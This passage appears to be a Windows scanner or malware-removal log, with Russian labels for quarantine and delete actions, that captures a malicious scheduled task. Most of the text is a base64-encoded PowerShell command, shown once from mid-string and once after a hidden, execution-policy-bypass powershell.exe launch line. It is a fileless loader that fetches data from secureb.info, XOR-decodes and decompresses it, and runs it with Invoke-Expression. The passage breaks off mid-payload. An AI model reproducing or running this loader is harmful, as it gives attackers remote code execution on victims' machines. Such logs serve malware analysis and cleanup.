WABtAGsAeAB0AGYAbAAxAEUAdgBXADgANwBEAHMAcgBBAHQAQgA5ADMAeQBEAE4AQwA1AG4ARABlAGMATgBuAE4AcABsAGIAaQBxAFoATwBEAEoAcABoAEQAWABRAFoAbABkAFAASgBJAHgARgBCAGgARgBMAGMAUgB4AHkASQBpADMAVQAxAEEAVwBfAHYAWAAwAEIAbwBKAHIAawA5AHoAYQBiAHQAaAB5AHEASQA2AGgARQBPAFMAMwBFAFgAOABSAHoARgBIAFkAcAByAFkAdgB2AEkAMQBOAHUARAA1AGEAMABWAFoAagBIAG8AZAAzAEwAYwA3AEMAawBZAG0ATABoADIAegBOAHoAbQBkAFQAOQBRAHIAeQBHAGMAWgBDAHYATwBMAEkANAB4ADUAdQB3AE4AWQBZAGQAYgBFAEMAcgBCAFIAdABZAHIAMABEADAAZwBxAGsAbwAyAFUAVwBTAHMARwBYADIARgBHAE8AMwBDAFEANgAzAFkAbwBjAGgAbwBmAG8AQwB5AGIAMQBGADgATwBWAHAAcQBsADIASABzAE0ALQBqAFIAUgBmADIAWABCADUALQBSAEYAbQBhAHoAaQB0AGcAUwByAEsAQgA5AE4AUgBsAHEAdwBOAGMAcAAxAFMAWQBFAHMAaABfAHQARQBQAGwAYQA5AHMAVQA1AFEASwBiAEMAcwBYAGsAdAByAEgAcgB6AGMAcABRAGIATABGAFEAdQBiAEcATgBwAHEANwBOAHQAYgBQAG4AcABFAFYAdgA5AGoAVQBrAHUAUQBFAGMATgAwAFYAZQA4AEMAawBKAFEAYgB6AFQAMwBwAHIANABHAGMAUQBzAE4ATwA5AF8AMQBVAFUAawBhAE0AZAA0AFcAaABsAHcAXwBLADUAMwBlAHgAYQBvAF8AegBhAFUAOQBzAFEAUwBGAEEAdQA0AHoAYgB6AHoARgB3AGYASgBfAHoAMABrAGwATABBAG0ATQBiAG8AZgBLAEQATgBmAC0AdwBVAEYAUwAtAHIAagBsAGEATABrAGYASwBUAHoALQBVAFEARwBaAEYANQBfADUAcwBRADMAagBUAHAAdABHAFEAUQBkAHcASwBhAEoAQQBFADgAXwBZAEkAQQBkAF8AbwBZADMAYgA0AGgAaQBqAHUAYQAyAFcAdQBEAFYAVgBqAEEAMABEAFEANQBLAG8AUABMAFQAVABYAEYASgB0AFIAUwB6AEgAYQBnAC0AbgA5AGEAeQAxADMAaABtAFcAVAB4AGMAQwBxAEIAZgAtAFkAdgByADIAQQBwAFkAWQA3AHgAbABxAEQAUQBzAEYAUwByAEwAdwBTAEcAUwBBADQAeAA1ADAAYQBpADkAcABFAEQASgBmAG4AWgBnAEwAUgBVAFYASwBOAGIAaQByAGUAVAB6AFkAZwBCADEAVAA2ADMAaQAxADUAVgBNAFEAagBtAHUAbABFAGcAZgBKAHYAdQBWAFAAcAB6AEwAWgBFAEIAVQBQAGkAVAA4AEsASABzAHMAQQBzADEAVABkAGwAUABsAFAAdwB4AFoAXwBEADAAVQBNAE0ANABhAEgAdgBFAEUAYQB2AEMARAA0AFYAcgBIAGMAQQBJAFEAbgBIAFQASgBDAEMAeQBmAFkAXwBvAHMAMABZAGkANwB2AGMAOABGAEwAdQBuAHoANAA1AEgAeABvAG0AQwBmAHYAWQBIAGwAdABDAHgATwAtAEQAdQBvAEsANQBXAEUAegBnAGEARQBPAGwAbgBqAHAAcgBWAHIAeQB2AHMARwB2AHUAbABfAEcAUABtAFYAcwBZAEEAaQBJADEAdQBTAHgAMQAtAEQAbgB5AGgAbgBMAGIAMwBWAHkAegBwAFcAcABRADMAMwAxAEIAcABqAE0AcwB5ADMAZQBPAGMAcABNAFgASwBPAHgAUgBEADUAdQBXADcARQBFAE0ASwAwAHAAdgBEADMASgBuAEYAQgA0AGgAOQB3AGkASgBCAE8AQQBLAEEAagBmAE8AQwAyAEMASQBvADUAcAA3AFcAdQBfAFYAZgBqAHoAVQBkAEoAMgBTAHgATAA1ADUAeABfAFkAYQB2AGkAdABNAFMAJgBjAD0ANwB6ADUAWAA0AHcAcgB3AFoAUgBwAHkAWQB5AHEAMwBRAE8ALQBCAG4AMgBDAGEAeQBhAC0AUwA3AHMARAAxAHcATQBDAG8AdQBqAHYANABhADUAQgBfADAARQAtAFMAMwBCAGUAYgBvAHEAcQBCAG0AaABkADYARQBvAHEARQAzAHMAdgBiAHMANgBBAGIAeQBfAGYATAAyAGcAbgBIADMARAA0AEkAQQBNAGgALQBKADIAQwBxAEUAYwB0AHIAVQAxAEEAYgA2ADgALQBNAG0AZAAwAG0AZwBBAGoAcABjAG0ARgBfADMAcABEAEoAaQBEADAAMgBHADYAdgB2AGcAYQBYADcAdQB1AFoAagBCAHAAOQBYAFIATABYAGMANgB5ADUAegBKAEUAQgBpAG4AMQBSAGsAbgAyAGgARQBqAEUASABOAGUAeQBJAG0AMgB4ADQASAAxAGYAZwB6AHYANwBRAEoAYgA3AFMAZgAwAGMAegBmAG4AZgBWAHkAVABFAC0AbwB0AHAAUwA0ADIAbQBVADIARQBGAE4ANwByAFAATQBCADEARgBaAEoAagBQADQAdQBBAFIANAA4AFoAQwAyAFoAZQAtAC0AcABKAHMAbwBjADcAXwBYAHYAeABuAHQAZABjAE0AdgBFAG0AcgBVAFcAZgBjAEUAVABDADIAUgBmAFYANgB1AFEAeAA4ADUAawBqAFAAMQBIADMAUQBnAHoAdQBYAHIAYwBZAEQAaABlAEQAQQB5AG0ANAB5AGUAMQB2AHAAUQBJADUAOABPAG8ALQAzADUAaQBoAGIASQBiAGcAQwBiAEIAYgBXAEgAMQBfADYAcwBRAHYAUwBvAHEAUgBYAEYARwBSADAAVQBSAG0AOQBCAEMAZwBjAEMAQwBVAEMAdwBFAEcATwAtAFoARwBpAHAAbgA0AHkANABZAEoAdgByAHYAYgBJAEgAZQBUAEsATAAwAF8AZgA3ADcATABPAHEANwBfAFYAYwBjAFcAegB1AFUAZgBNAGoAUwBoAGkAbgBDAGIAZgBmAGYASgBJAHoAYgB1AGsAZgBsAGsAbABrAFAAcQBXAFMAUgB2AEcATQBjAEUAMwBXADkANwBCAFAAcwBXAHUAYgB3AGMASQBSAHMARQBtAEwAQQBMAGsAbQBkAEcAVwBEADkAMQBYAEQAOQBSAF8AdwBhAHgARgBnAEkARgB2ADMAdwBjAHIATAA1ADEAbwBjAFkARgBNAFYAOABoAFgARgBMAHgAdwBfAFMAUQBJAHMAOQBFAFUASABFAGQAZABrAHQAWQBVAGQAaAA1AEYAUABrAFUAYwBhAEYAeQA4AGkAcABxADMANgB2ADQASABaAGUAVwBYAHIAawBYAHEAbgB2AGcASgB1ADkAWgBJADEAYQBOADYAWgB4AGUANQBLADAAZgAyAHEAWgBfAGIAVAAxADcANwBtADUAbgBpAHYAOABTAFEAOABYADIARgBrAEMAbwBfAFAAMgBBAEUAUwA5AEEAWQBBAF8AOQA1AEUANwBUAEkANgBBAE8ASAA4AF8ASQB3AEEAZQBPAEIARABYAHMAcgB3AEUAZgBkADkAUgBwADQAOQBwAGEAeQBPADcAdwAyAGsAVgBJAE0AZwBjAGIAYwByAFcAZgBfAE0AaABGADUAWABvAGMAdQBTADEAZgByAGoAYgBEAC0AWABPAGMAcAA4AHcAZQAxAGUAMwAtAE0AdwBmAFcAZABKAFgAdAA2AGEAMwB3AGoARwB6AEEAbQBmAFcAaQBIADgATQBxAHYATABaAFoANgBfAEgAbQBSADEAZgB4AF8AcwA3AE0AdgBhAEwAZwBjADIAagBBAFEANQBhAFQATwA2AEwAVwBYAFUASQBmAHAAUAB3ADQAdwA4AHQAegBfADEAZABSAG0ASQBwAGsASQB0AG0AZAB4AFMASQBfAHYATABBAEYAbwB0AHQATABFAFMASQB3ADYAbQBuAEMAVQBLAE0ATwBNAGYASAB6AEsAdQBkAE4AdABSAFMAMQBBAFcAeABvAGcATwA1AEcAeQBsADcANAAxAHUAVQBIADEASwBQAHEAWgBnAHAAdABLAFMAUgBOAGQAMABfADMASgA2AEkAcgAzAGIATQBFAGEAbQAwAEwAbABPAGMAUwBxAHgANQBjAHUAdABVAHQAUQBMAG8AVgBiAFMAZwB0AFQAZgBfAGMAdgB6AE0ATwBTAFUAVABFAF8AVQBTAFgAYQAtAGQAWQBRAFYAYgBQAGUASwBlAEEAVgBCAE8AUQBUAFIAcwBYAGoALQBqAFUAOABmAHMAdwBHAEEAOAB6AGUARwBrADcANgBBADcATwBrAFYATQB2AHAANQBqAFUAcQBEAE0ASQBCAG0ARQBjAFIAYQBEAFYANQBvAHgAOABFAGYAJgByAD0ANAA4ADQAMAA2ADIAMgAyADMANQA0ADkAMwA0ADYANAAwADIAMAAiADsAJABzAHQAcwBrAD0AIgB7ADAAQQAwAEIAMABCADQANwAtADcARAAwAEEALQAwAEQANwBEAC0AMABCADEAMQAtADcARQA3AEQAMABGADAAQQAxADEAMABBAH0AIgA7ACQAcAByAGkAZAA9ACIAUwB5AHMAdABlAG0ASABlAGEAbABlAHIAIgA7ACQAaQBuAGkAZAA9ACIASQBKAEgASQBNAEwAUgBJACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
{0A0B0B47-7D0A-0D7D-0B11-7E7D0F0A110A}
Скрипт: Удалить
The task is ready to run at its next scheduled time.C:\Windows\system32\Tasks\ C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAZQBjAHUAcgBlAGIALgBpAG4AZgBvAC8AdQAvAD8AYQA9AEQAOQAxAGwAUgBJAEoAdQBzAF8AMABPAGQAOQBpAEUAeQBVAFEAWQBXADQAdABJAEUAeQBmAGIAYQBJADcATABwAHMAdQBYAHgAaABLAGEAXwBrAG4AbgBoAGwAVgBNAEoATABfAFUAYwBYADQAVwBrADMAUgBmAGYASwA2AFEAWQAyADcAUQBiADgASgAtAGoAVABNAGkAQgB4AE0ARQBHAEoANgBiAGwAaAB4AGQAdgBhAFYAOAAwADgASQB2AGwAWABtAGsAeAB0AGYAbAAxAEUAdgBXADgANwBEAHMAcgBBAHQAQgA5ADMAeQBEAE4AQwA1AG4ARABlAGMATgBuAE4AcABsAGIAaQBxAFoATwBEAEoAcABoAEQAWABRAFoAbABkAFAASgBJAHgARgBCAGgARgBMAGMAUgB4AHkASQBpADMAVQAxAEEAVwBfAHYAWAAwAEIAbwBKAHIAawA5AHoAYQBiAHQAaAB5AHEASQA2AGgARQBPAFMAMwBFAFgAOABSAHoARgBIAFkAcAByAFkAdgB2AEkAMQBOAHUARAA1AGEAMABWAFoAagBIAG8AZAAzAEwAYwA3AEMAawBZAG0ATABoADIAegBOAHoAbQBkAFQAOQBRAHIAeQBHAGMAWgBDAHYATwBMAEkANAB4ADUAdQB3AE4AWQBZAGQAYgBFAEMAcgBCAFIAdABZAHIAMABEADAAZwBxAGsAbwAyAFUAVwBTAHMARwBYADIARgBHAE8AMwBDAFEANgAzAFkAbwBjAGgAbwBmAG8AQwB5AGIAMQBGADgATwBWAHAAcQBsADIASABzAE0ALQBqAFIAUgBmADIAWABCADUALQBSAEYAbQBhAHoAaQB0AGcAUwByAEsAQgA5AE4AUgBsAHEAdwBOAGMAcAAxAFMAWQBFAHMAaABfAHQARQBQAGwAYQA5AHMAVQA1AFEASwBiAEMAcwBYAGsAdAByAEgAcgB6AGMAcABRAGIATABGAFEAdQBiAEcATgBwAHEANwBOAHQAYgBQAG4AcABFAFYAdgA5AGoAVQBrAHUAUQBFAGMATgAwAFYAZQA4AEMAawBKAFEAYgB6AFQAMwBwAHIANABHAGMAUQBzAE4ATwA5AF8AMQBVAFUAawBhAE0AZAA0AFcAaABsAHcAXwBLADUAMwBlAHgAYQBvAF8AegBhAFUAOQBzAFEAUwBGAEEAdQA0AHoAYgB6AHoARgB3AGYASgBfAHoAMABrAGwATABBAG0ATQBiAG8AZgBLAEQATgBmAC0AdwBVAEYAUwAtAHIAagBsAGEATABrAGYASwBUAHoALQBVAFEARwBaAEYANQBfADUAcwBRADMAagBUAHAAdABHAFEAUQBkAHcASwBhAEoAQQBFADgAXwBZAEkAQQBkAF8AbwBZADMAYgA0AGgAaQBqAHUAYQAyAFcAdQBEAFYAVgBqAEEAMABEAFEANQBLAG8AUABMAFQAVABYAEYASgB0AFIAUwB6AEgAYQBnAC0AbgA5AGEAeQAxADMAaABtAFcAVAB4AGMAQwBxAEIAZgAtAFkAdgByADIAQQBwAFkAWQA3AHgAbABxAEQAUQBzAEYAUwByAEwAdwBTAEcAUwBBADQAeAA1ADAAYQBpADkAcABFAEQASgBmAG4AWgBnAEwAUgBVAFYASwBOAGIAaQByAGUAVAB6AFkAZwBCADEAVAA2ADMAaQAxADUAVgBNAFEAagBtAHUAbABFAGcAZgBKAHYAdQBWAFAAcAB6AEwAWgBFAEIAVQBQAGkAVAA4AEsASABzAHMAQQBzADEAVABkAGwAUABsAFAAdwB4AFoAXwBEADAAVQBNAE0ANABhAEgAdgBFAEUAYQB2AEMARAA0AFYAcgBIAGMAQQBJAFEAbgBIAFQASgBDAEMAeQBmAFkAXwBvAHMAMABZAGkANwB2AGMAOABGAEwAdQBuAHoANAA1AEgAeABvAG0AQwBmAHYAWQBIAGwAdABDAHgATwAtAEQAdQBvAEsANQBXAEUAegBnAGEARQBPAGwAbgBqAHAAcgBWAHIAeQB2AHMARwB2AHUAbABfAEcAUABtAFYAcwBZAEEAaQBJADEAdQBTAHgAMQAtAEQAbgB5AGgAbgBMAGIAMwBWAHkAegBwAFcAcABRADMAMwAxAEIAcABqAE0AcwB5ADMAZQBPAGMAcABNAFgASwBPAHgAUgBEADUAdQBXADcARQBFAE0ASwAwAHAAdgBEADMASgBuAEYAQgA0AGgAOQB3AGkASgBCAE8AQQBLAEEAagBmAE8AQwAyAEMASQBvADUAcAA3AFcAdQBfAFYAZgBqAHoAVQBkAEoAMgBTAHgATAA1ADUAeABfAFkAYQB2AGkAdABNAFMAJgBjAD0ANwB6ADUAWAA0AHcAcgB3AFoAUgBwAHkAWQB5AHEAMwBRAE8ALQBCAG4AMgBDAGEAeQBhAC0AUwA3AHMARAAxAHcATQBDAG8AdQBqAHYANABhADUAQgBfADAARQAtAFMAMwBCAGUAYgBvAHEAcQBCAG0AaABkADYARQBvAHEARQAzAHMAdgBiAHMANgBBAGIAeQBfAGYATAAyAGcAbgBIADMARAA0AEkAQQBNAGgALQBKADIAQwBxAEUAYwB0AHIAVQAxAEEAYgA2ADgALQBNAG0AZAAwAG0AZwBBAGoAcABjAG0ARgBfADMAcABEAEoAaQBEADAAMgBHADYAdgB2AGcAYQBYADcAdQB1AFoAagBCAHAAOQBYAFIATABYAGMANgB5ADUAegBKAEUAQgBpAG4AMQBSAGsAbgAyAGgARQBqAEUASABOAGUAeQBJAG0AMgB4ADQASAAxAGYAZwB6AHYANwBRAEoAYgA3AFMAZgAwAGMAegBmAG4AZgBWAHkAVABFAC0AbwB0AHAAUwA0ADIAbQBVADIARQBGAE4ANwByAFAATQBCADEARgBaAEoAagBQADQAdQBBAFIANAA4AFoAQwAyAFoAZQAtAC0AcABKAHMAbwBjADcAXwBYAHYAeABuAHQAZABjAE0AdgBFAG0AcgBVAFcAZgBjAEUAVABDADIAUgBmAFYANgB1AFEAeAA4ADUAawBqAFAAMQBIADMAUQBnAHoAdQBYAHIAYwBZAEQAaABlAEQAQQB5AG0ANAB5AGUAMQB2AHAAUQBJADUAOABPAG8ALQAzADUAaQBoAGIASQBiAGcAQwBiAEIAYgBXAEgAMQBfADYAcwBRAHYAUwBvAHEAUgBYAEYARwBSADAAVQBSAG0AOQBCAEMAZwBjAEMAQwBVAEMAdwBFAEcATwAtAFoARwBpAHAAbgA0AHkANABZAEoAdgByAHYAYgBJAEgAZQBUAEsATAAwAF8AZgA3ADcATABPAHEANwBfAFYAYwBjAFcAegB1AFUAZgBNAGoAUwBoAGkAbgBDAGIAZgBmAGYASgBJAHoAYgB1AGsAZgBsAGsAbABrAFAAcQBXAFMAUgB2AEcATQBjAEUAMwBXADkANwBCAFAAcwBXAHUAYgB3AGMASQBSAHMARQBtAEwAQQBMAGsAbQBkAEcAVwBEADkAMQBYAEQAOQBSAF8AdwBhAHgARgBnAEkARgB2ADMAdwBjAHIATAA1ADEAbwBjAFkARgBNAFYAOABoAFgARgBMAHgAdwBfAFMAUQBJAHMAOQBFAFUASABFAGQAZABrAHQAWQBVAGQAaAA1AEYAUABrAFUAYwBhAEYAeQA4AGkAcABxADMANgB2ADQASABaAGUAVwBYAHIAawBYAHEAbgB2AGcASgB1ADkAWgBJADEAYQBOADYAWgB4AGUANQBLADAAZgAyAHEAWgBfAGIAVAAxADcANwBtADUAbgBpAHYAOABTAFEAOABYADIARgBrAEMAbwBfAFAAMgBBAEUAUwA5AEEAWQBBAF8AOQA1AEUANwBUAEkANgBBAE8ASAA4AF8ASQB3AEEAZQBPAEIARABYAHMAcgB3AEUAZgBkADkAUgBwADQAOQBwAGEAeQBPADcAdwAyAGsAVgBJAE0AZwBjAGIAYwByAFcAZgBfAE0AaABGADUAWABvAGMAdQBTADEAZgByAGoAYgBEAC0AWABPAGMAcAA4AHcAZQAxAGUAMwAtAE0AdwBmAFcAZABKAFgAdAA2AGEAMwB3AGoARwB6AEEAbQBmAFcAaQBIADgATQBxAHYATABaAFoANgBfAEgAbQBSADEAZgB4AF8AcwA3AE0AdgBhAEwAZwBjADIAagBBAFEANQBhAFQATwA2AEwAVwBYAFUASQBmAHAAUAB3ADQAdwA4AHQAegBfADEAZABSAG0ASQBwAGsASQB0AG0AZAB4AFMASQBfAHYATABBAEYAbwB0AHQATABFAFMASQB3ADYAbQBuAEMAVQBLAE0ATwBNAGYASAB6AEsAdQBkAE4AdABSAFMAMQBBAFcAeABvAGcATwA1AEcAeQBsADcANAAxAHUAVQBIADEASwBQAHEAWgBnAHAAdABLAFMAUgBOAGQAMABfADMASgA2AEkAcgAzAGIATQBFAGEAbQAwAEwAbABPAGMAUwBxAHgANQBjAHUAdABVAHQAUQBMAG8AVgBiAFMAZwB0AFQAZgBfAGMAdgB6AE0ATwBTAFUAVABFAF8AVQBTAFgAYQAtAGQAWQBRAFYAYgBQAGUASwBlAEEAVgBCAE8AUQBUAFIAcwBYAGoALQBqAFUAOABmAHMAdwBHAEEAOAB6AGUARwBrADcANgBBADcATwBrAFYATQB2AHAANQBqAFUAcQBEAE0ASQBCAG0ARQBjAFIAYQBEAFYANQBvAHgAOABFAGYAJgByAD0ANAA4ADQAMAA2ADIAMgAyADMANQA0ADkAMwA0ADYANAAwADIAMAAiADsAJABzAHQAcwBrAD0AIgB7ADAAQQAwAEIAMABCADQANwAtADcARAAwAEEALQAwAEQANwBEAC0AMABCADEAMQAtADcARQA3AEQAMABGADAAQQAxADEAMABBAH0AIgA7ACQAcAByAGkAZAA9ACIAUwB5AHMAdABlAG0ASABlAGEAbABlAHIAIgA7ACQAaQBuAGkAZAA9ACIASQBKAEgASQBNAEwAUgBJACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwB